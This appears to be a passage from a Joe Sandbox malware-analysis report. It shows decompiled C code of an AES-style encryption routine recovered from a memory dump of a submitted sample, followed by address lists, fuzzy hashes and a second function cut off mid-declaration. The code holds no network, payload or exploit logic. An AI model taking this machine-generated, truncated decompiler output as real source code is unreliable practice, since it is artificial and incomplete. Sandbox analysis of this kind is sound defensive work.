				signed char _t643;
				signed char _t645;
				signed char _t646;
				signed char _t648;
				signed char _t650;
				signed char _t651;
				signed char _t653;
				signed char _t655;
				signed char _t656;
				signed char _t658;
				signed char _t660;
				signed char _t661;
				signed char _t663;
				signed char _t665;
				signed char _t666;
				signed char _t668;
				signed char _t670;
				signed char _t671;
				signed char _t673;
				signed char _t675;
				signed char _t676;
				signed char _t681;
				signed char _t682;
				signed char _t684;
				signed char _t686;
				signed char _t687;
				signed char _t690;
				signed char _t691;
				signed char _t693;
				signed char _t695;
				signed char _t696;
				signed int _t699;
				signed char _t700;
				signed char _t708;
				signed char _t709;
				signed char _t717;
				signed char _t718;
				signed char _t726;
				signed char _t727;
				signed char _t735;
				signed char _t736;
				signed char _t744;
				signed char _t745;
				signed char _t753;
				signed char _t754;
				signed char _t762;
				signed char _t763;
				signed char _t771;
				signed char _t772;
				signed char _t780;
				signed char _t781;
				signed char _t789;
				signed char _t797;
				signed char _t798;
				signed char _t806;
				signed char _t814;
				signed char _t815;
				signed int _t824;
				signed char _t825;
				signed char _t826;
				signed char _t827;
				signed char _t828;
				signed char _t829;
				signed char _t830;
				signed char _t831;
				signed char _t832;
				signed char _t833;
				signed char _t834;
				signed char _t835;
				signed char _t836;
				signed char _t837;
				signed char _t838;
				signed char _t839;
				signed char _t840;
				signed char _t841;
				signed char _t842;
				signed char _t843;
				signed char _t844;
				signed char _t845;
				signed char _t846;
				signed char _t847;
				signed char _t848;
				signed char _t849;
				signed int _t851;
				signed int* _t924;
				signed int* _t997;
				signed int* _t998;
				signed int* _t999;
				signed int* _t1011;
				signed int* _t1012;
				signed int* _t1024;
				signed int* _t1025;
				signed int* _t1037;
				signed int* _t1038;
				signed int* _t1050;
				signed int* _t1051;
				signed int* _t1063;
				signed int* _t1064;
				signed int* _t1076;
				signed int* _t1077;
				signed int* _t1089;
				signed int* _t1090;
				signed int* _t1102;
				signed int* _t1103;
				signed int* _t1115;
				signed int* _t1116;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1131;
				signed int* _t1143;
				signed int* _t1144;
				signed int* _t1156;
				signed int* _t1168;
				signed int* _t1169;
				signed int** _t1181;

				_t1181[4] = _t997;
				_t1181[3] = __ebx;
				_t1181[2] = __esi;
				_t1181[1] = __edi;
				_t924 = _t1181[6];
				_t998 = _t1181[8];
				_t851 = _t998[0x3c] & 0x000000ff;
				_t514 =  *_t924 ^  *_t998;
				_t628 = _t924[1] ^ _t998[1];
				_t699 = _t924[2] ^ _t998[2];
				_t824 = _t924[3] ^ _t998[3];
				if(_t851 == 0xa0) {
					L6:
					_t999 =  &(_t998[4]);
					 *_t1181 = _t999;
					asm("rol eax, 0x10");
					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
					_t700 = _t699 >> 0x10;
					_t631 = _t630 >> 0x10;
					_t825 = _t824 >> 0x10;
					_t708 = _t999[2] ^  *(0xf4ec240 + (_t699 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t628 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t825 & 0x000000ff) * 4);
					_t826 = _t999[3] ^  *(0xf4ec240 + (_t824 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t699 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t514 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t631 & 0x000000ff) * 4);
					_t1011 =  *_t1181;
					_t522 =  *(0xf4eca40 + (_t700 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t630 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t824 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
					_t633 =  *(0xf4ec240 + (_t628 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t630 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t700 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
					_t1012 =  &(_t1011[4]);
					 *_t1181 = _t1012;
					asm("rol eax, 0x10");
					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
					_t709 = _t708 >> 0x10;
					_t636 = _t635 >> 0x10;
					_t827 = _t826 >> 0x10;
					_t717 = _t1012[2] ^  *(0xf4ec240 + (_t708 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t633 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t522 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t827 & 0x000000ff) * 4);
					_t828 = _t1012[3] ^  *(0xf4ec240 + (_t826 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t708 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t522 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t636 & 0x000000ff) * 4);
					_t1024 =  *_t1181;
					_t530 =  *(0xf4eca40 + (_t709 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t635 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t826 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
					_t638 =  *(0xf4ec240 + (_t633 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t635 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t709 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
					_t1025 =  &(_t1024[4]);
					 *_t1181 = _t1025;
					asm("rol eax, 0x10");
					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
					_t718 = _t717 >> 0x10;
					_t641 = _t640 >> 0x10;
					_t829 = _t828 >> 0x10;
					_t726 = _t1025[2] ^  *(0xf4ec240 + (_t717 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t638 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t530 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t829 & 0x000000ff) * 4);
					_t830 = _t1025[3] ^  *(0xf4ec240 + (_t828 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t717 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t530 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t641 & 0x000000ff) * 4);
					_t1037 =  *_t1181;
					_t538 =  *(0xf4eca40 + (_t718 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t640 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t828 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
					_t643 =  *(0xf4ec240 + (_t638 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t640 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t718 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
					_t1038 =  &(_t1037[4]);
					 *_t1181 = _t1038;
					asm("rol eax, 0x10");
					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
					_t727 = _t726 >> 0x10;
					_t646 = _t645 >> 0x10;
					_t831 = _t830 >> 0x10;
					_t735 = _t1038[2] ^  *(0xf4ec240 + (_t726 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t643 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t538 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t831 & 0x000000ff) * 4);
					_t832 = _t1038[3] ^  *(0xf4ec240 + (_t830 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t726 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t538 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t646 & 0x000000ff) * 4);
					_t1050 =  *_t1181;
					_t546 =  *(0xf4eca40 + (_t727 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t645 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t830 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
					_t648 =  *(0xf4ec240 + (_t643 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t645 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t727 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
					_t1051 =  &(_t1050[4]);
					 *_t1181 = _t1051;
					asm("rol eax, 0x10");
					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
					_t736 = _t735 >> 0x10;
					_t651 = _t650 >> 0x10;
					_t833 = _t832 >> 0x10;
					_t744 = _t1051[2] ^  *(0xf4ec240 + (_t735 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t648 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t546 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t833 & 0x000000ff) * 4);
					_t834 = _t1051[3] ^  *(0xf4ec240 + (_t832 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t735 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t546 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t651 & 0x000000ff) * 4);
					_t1063 =  *_t1181;
					_t554 =  *(0xf4eca40 + (_t736 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t650 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t832 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
					_t653 =  *(0xf4ec240 + (_t648 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t650 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t736 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
					_t1064 =  &(_t1063[4]);
					 *_t1181 = _t1064;
					asm("rol eax, 0x10");
					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
					_t745 = _t744 >> 0x10;
					_t656 = _t655 >> 0x10;
					_t835 = _t834 >> 0x10;
					_t753 = _t1064[2] ^  *(0xf4ec240 + (_t744 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t653 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t554 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t835 & 0x000000ff) * 4);
					_t836 = _t1064[3] ^  *(0xf4ec240 + (_t834 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t744 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t554 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t656 & 0x000000ff) * 4);
					_t1076 =  *_t1181;
					_t562 =  *(0xf4eca40 + (_t745 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t655 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t834 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
					_t658 =  *(0xf4ec240 + (_t653 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t655 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t745 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
					_t1077 =  &(_t1076[4]);
					 *_t1181 = _t1077;
					asm("rol eax, 0x10");
					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
					_t754 = _t753 >> 0x10;
					_t661 = _t660 >> 0x10;
					_t837 = _t836 >> 0x10;
					_t762 = _t1077[2] ^  *(0xf4ec240 + (_t753 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t658 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t562 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t837 & 0x000000ff) * 4);
					_t838 = _t1077[3] ^  *(0xf4ec240 + (_t836 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t753 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t562 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t661 & 0x000000ff) * 4);
					_t1089 =  *_t1181;
					_t570 =  *(0xf4eca40 + (_t754 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t660 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t836 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
					_t663 =  *(0xf4ec240 + (_t658 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t660 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t754 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
					_t1090 =  &(_t1089[4]);
					 *_t1181 = _t1090;
					asm("rol eax, 0x10");
					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
					_t763 = _t762 >> 0x10;
					_t666 = _t665 >> 0x10;
					_t839 = _t838 >> 0x10;
					_t771 = _t1090[2] ^  *(0xf4ec240 + (_t762 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t663 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t570 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t839 & 0x000000ff) * 4);
					_t840 = _t1090[3] ^  *(0xf4ec240 + (_t838 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t762 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t570 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t666 & 0x000000ff) * 4);
					_t1102 =  *_t1181;
					_t578 =  *(0xf4eca40 + (_t763 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t665 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t838 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
					_t668 =  *(0xf4ec240 + (_t663 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t665 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t763 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
					_t1103 =  &(_t1102[4]);
					 *_t1181 = _t1103;
					asm("rol eax, 0x10");
					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t671 = _t670 >> 0x10;
					_t841 = _t840 >> 0x10;
					_t780 = _t1103[2] ^  *(0xf4ec240 + (_t771 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t668 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t578 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t841 & 0x000000ff) * 4);
					_t842 = _t1103[3] ^  *(0xf4ec240 + (_t840 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t771 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t578 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t671 & 0x000000ff) * 4);
					_t1115 =  *_t1181;
					_t586 =  *(0xf4eca40 + (_t772 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t670 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t840 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
					_t673 =  *(0xf4ec240 + (_t668 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t670 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t772 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
					_t1116 =  &(_t1115[4]);
					 *_t1181 = _t1116;
					asm("rol eax, 0x10");
					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
					_t781 = _t780 >> 0x10;
					_t676 = _t675 >> 0x10;
					_t843 = _t842 >> 0x10;
					_t1128 =  *_t1181;
					_t1129 = _t1181[7];
					 *_t1129 =  *(0xf4eda40 + (_t781 & 0x000000ff) * 4) ^  *(0xf4ed240 + (_t675 & 0x000000ff) * 4) ^  *(0xf4ed640 + (_t842 & 0x000000ff) * 4) ^  *(0xf4ede40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
					_t1129[1] =  *(0xf4ed240 + (_t673 & 0x000000ff) * 4) ^  *(0xf4ed640 + (_t675 & 0x000000ff) * 4) ^  *(0xf4ede40 + (_t781 & 0x000000ff) * 4) ^  *(0xf4eda40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
					_t1129[2] = _t1116[2] ^  *(0xf4ed240 + (_t780 & 0x000000ff) * 4) ^  *(0xf4ed640 + (_t673 & 0x000000ff) * 4) ^  *(0xf4eda40 + (_t586 & 0x000000ff) * 4) ^  *(0xf4ede40 + (_t843 & 0x000000ff) * 4);
					_t1129[3] = _t1116[3] ^  *(0xf4ed240 + (_t842 & 0x000000ff) * 4) ^  *(0xf4ed640 + (_t780 & 0x000000ff) * 4) ^  *(0xf4ede40 + (_t586 & 0x000000ff) * 4) ^  *(0xf4eda40 + (_t676 & 0x000000ff) * 4);
					_t595 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1131 =  &(_t998[4]);
						 *_t1181 = _t1131;
						asm("rol eax, 0x10");
						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
						_t789 = _t699 >> 0x10;
						_t682 = _t681 >> 0x10;
						_t844 = _t824 >> 0x10;
						_t797 = _t1131[2] ^  *(0xf4ec240 + (_t699 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t628 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t844 & 0x000000ff) * 4);
						_t845 = _t1131[3] ^  *(0xf4ec240 + (_t824 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t699 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t514 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t682 & 0x000000ff) * 4);
						_t1143 =  *_t1181;
						_t603 =  *(0xf4eca40 + (_t789 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t681 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t824 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
						_t684 =  *(0xf4ec240 + (_t628 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t681 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t789 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
						_t1144 =  &(_t1143[4]);
						 *_t1181 = _t1144;
						asm("rol eax, 0x10");
						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
						_t798 = _t797 >> 0x10;
						_t687 = _t686 >> 0x10;
						_t846 = _t845 >> 0x10;
						_t699 = _t1144[2] ^  *(0xf4ec240 + (_t797 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t684 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t603 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t846 & 0x000000ff) * 4);
						_t824 = _t1144[3] ^  *(0xf4ec240 + (_t845 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t797 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t603 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t687 & 0x000000ff) * 4);
						_t998 =  *_t1181;
						_t514 =  *(0xf4eca40 + (_t798 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t686 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t845 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
						_t628 =  *(0xf4ec240 + (_t684 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t686 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t798 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1156 =  &(_t998[4]);
							 *_t1181 = _t1156;
							asm("rol eax, 0x10");
							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
							_t806 = _t699 >> 0x10;
							_t691 = _t690 >> 0x10;
							_t847 = _t824 >> 0x10;
							_t814 = _t1156[2] ^  *(0xf4ec240 + (_t699 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t628 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t847 & 0x000000ff) * 4);
							_t848 = _t1156[3] ^  *(0xf4ec240 + (_t824 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t699 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t514 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t691 & 0x000000ff) * 4);
							_t1168 =  *_t1181;
							_t618 =  *(0xf4eca40 + (_t806 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t690 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t824 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
							_t693 =  *(0xf4ec240 + (_t628 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t690 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t806 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
							_t1169 =  &(_t1168[4]);
							 *_t1181 = _t1169;
							asm("rol eax, 0x10");
							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
							_t815 = _t814 >> 0x10;
							_t696 = _t695 >> 0x10;
							_t849 = _t848 >> 0x10;
							_t699 = _t1169[2] ^  *(0xf4ec240 + (_t814 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t693 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t618 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t849 & 0x000000ff) * 4);
							_t824 = _t1169[3] ^  *(0xf4ec240 + (_t848 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t814 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t618 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t696 & 0x000000ff) * 4);
							_t998 =  *_t1181;
							_t514 =  *(0xf4eca40 + (_t815 & 0x000000ff) * 4) ^  *(0xf4ec240 + (_t695 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t848 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
							_t628 =  *(0xf4ec240 + (_t693 & 0x000000ff) * 4) ^  *(0xf4ec640 + (_t695 & 0x000000ff) * 4) ^  *(0xf4ece40 + (_t815 & 0x000000ff) * 4) ^  *(0xf4eca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
							goto L5;
						} else {
							_t595 = 0xffffffff;
						}
					}
				}
				return _t595;
			}

0x0f4e1c23
0x0f4e1c27
0x0f4e1c2b
0x0f4e1c2f
0x0f4e1c33
0x0f4e1c45
0x0f4e1c49
0x0f4e1c50
0x0f4e1c53
0x0f4e1c56
0x0f4e1c59
0x0f4e1c62
0x0f4e1fce
0x0f4e1fce
0x0f4e1fd1
0x0f4e1fda
0x0f4e202c
0x0f4e202e
0x0f4e2063
0x0f4e2066
0x0f4e2093
0x0f4e2095
0x0f4e2097
0x0f4e209a
0x0f4e209d
0x0f4e20a0
0x0f4e20a3
0x0f4e20ac
0x0f4e20fe
0x0f4e2100
0x0f4e2135
0x0f4e2138
0x0f4e2165
0x0f4e2167
0x0f4e2169
0x0f4e216c
0x0f4e216f
0x0f4e2172
0x0f4e2175
0x0f4e217e
0x0f4e21d0
0x0f4e21d2
0x0f4e2207
0x0f4e220a
0x0f4e2237
0x0f4e2239
0x0f4e223b
0x0f4e223e
0x0f4e2241
0x0f4e2244
0x0f4e2247
0x0f4e2250
0x0f4e22a2
0x0f4e22a4
0x0f4e22d9
0x0f4e22dc
0x0f4e2309
0x0f4e230b
0x0f4e230d
0x0f4e2310
0x0f4e2313
0x0f4e2316
0x0f4e2319
0x0f4e2322
0x0f4e2374
0x0f4e2376
0x0f4e23ab
0x0f4e23ae
0x0f4e23db
0x0f4e23dd
0x0f4e23df
0x0f4e23e2
0x0f4e23e5
0x0f4e23e8
0x0f4e23eb
0x0f4e23f4
0x0f4e2446
0x0f4e2448
0x0f4e247d
0x0f4e2480
0x0f4e24ad
0x0f4e24af
0x0f4e24b1
0x0f4e24b4
0x0f4e24b7
0x0f4e24ba
0x0f4e24bd
0x0f4e24c6
0x0f4e2518
0x0f4e251a
0x0f4e254f
0x0f4e2552
0x0f4e257f
0x0f4e2581
0x0f4e2583
0x0f4e2586
0x0f4e2589
0x0f4e258c
0x0f4e258f
0x0f4e2598
0x0f4e25ea
0x0f4e25ec
0x0f4e2621
0x0f4e2624
0x0f4e2651
0x0f4e2653
0x0f4e2655
0x0f4e2658
0x0f4e265b
0x0f4e265e
0x0f4e2661
0x0f4e266a
0x0f4e26bc
0x0f4e26be
0x0f4e26f3
0x0f4e26f6
0x0f4e2723
0x0f4e2725
0x0f4e2727
0x0f4e272a
0x0f4e272d
0x0f4e2730
0x0f4e2733
0x0f4e273c
0x0f4e278e
0x0f4e2790
0x0f4e27c5
0x0f4e27c8
0x0f4e27f5
0x0f4e27fe
0x0f4e2802
0x0f4e2805
0x0f4e2808
0x0f4e280b
0x0f4e280e
0x0f4e1c68
0x0f4e1c6e
0x0f4e1e2a
0x0f4e1e2a
0x0f4e1e2d
0x0f4e1e36
0x0f4e1e88
0x0f4e1e8a
0x0f4e1ebf
0x0f4e1ec2
0x0f4e1eef
0x0f4e1ef1
0x0f4e1ef3
0x0f4e1ef6
0x0f4e1ef9
0x0f4e1efc
0x0f4e1eff
0x0f4e1f08
0x0f4e1f5a
0x0f4e1f5c
0x0f4e1f91
0x0f4e1f94
0x0f4e1fc1
0x0f4e1fc3
0x0f4e1fc5
0x0f4e1fc8
0x0f4e1fcb
0x00000000
0x0f4e1c74
0x0f4e1c7a
0x0f4e1c86
0x0f4e1c89
0x0f4e1c92
0x0f4e1ce4
0x0f4e1ce6
0x0f4e1d1b
0x0f4e1d1e
0x0f4e1d4b
0x0f4e1d4d
0x0f4e1d4f
0x0f4e1d52
0x0f4e1d55
0x0f4e1d58
0x0f4e1d5b
0x0f4e1d64
0x0f4e1db6
0x0f4e1db8
0x0f4e1ded
0x0f4e1df0
0x0f4e1e1d
0x0f4e1e1f
0x0f4e1e21
0x0f4e1e24
0x0f4e1e27
0x00000000
0x0f4e1c7c
0x0f4e1c7c
0x0f4e1c7c
0x0f4e1c7a
0x0f4e1c6e
0x0f4e2823

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa9cde07611bad4fb9b417326ed4e56513288aeed7fe9c8f3989567c717aa6e
Instruction ID: 3144e01d4b36d9375d4b90dc4f2c614af7b2a56dfcb58ffce29e1e6441a2daa6
Opcode Fuzzy Hash: 9fa9cde07611bad4fb9b417326ed4e56513288aeed7fe9c8f3989567c717aa6e
Instruction Fuzzy Hash: C3720531D102688FDB84EF6EE4D40B677A1F744332B47052AAFA15F692D634B930EB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E1020 Relevance: .7, Instructions: 720
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F4E1020(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t513;
				signed char _t515;
				signed char _t516;
				signed char _t518;
				signed char _t520;
				signed char _t521;
				signed char _t523;
				signed char _t525;
				signed char _t526;
				signed char _t528;
				signed char _t530;
				signed char _t531;
				signed char _t533;
				signed char _t535;
				signed char _t536;
				signed char _t538;
				signed char _t540;
				signed char _t541;
				signed char _t543;
				signed char _t545;
				signed char _t546;
				signed char _t548;
				signed char _t550;
				signed char _t551;
				signed char _t553;
				signed char _t555;
				signed char _t556;
				signed char _t558;
				signed char _t560;
				signed char _t561;
				void* _t564;
				signed char _t566;
				signed char _t567;
				signed char _t569;
				signed char _t571;
				signed char _t572;
				signed char _t575;
				signed char _t576;
				signed char _t578;
				signed char _t580;
				signed char _t581;
				signed int _t585;
				signed char _t594;
				signed char _t603;
				signed char _t612;
				signed char _t621;
				signed char _t630;
				signed char _t639;
				signed char _t648;
				signed char _t657;
				signed char _t666;
				signed char _t685;
				signed char _t702;
				signed int _t712;
				signed char _t713;
				signed char _t714;
				signed char _t715;
				signed char _t716;
				signed char _t717;
				signed char _t718;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed char _t722;
				signed char _t723;
				signed char _t724;
				signed char _t725;
				signed char _t726;
				signed char _t727;
				signed char _t728;
				signed char _t729;
				signed char _t730;
				signed char _t731;
				signed char _t732;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed char _t736;
				signed char _t737;
				signed int _t739;
				signed char _t740;
				signed char _t747;
				signed char _t748;
				signed char _t755;
				signed char _t756;
				signed char _t763;
				signed char _t764;
				signed char _t771;
				signed char _t772;
				signed char _t779;
				signed char _t780;
				signed char _t787;
				signed char _t788;
				signed char _t795;
				signed char _t796;
				signed char _t803;
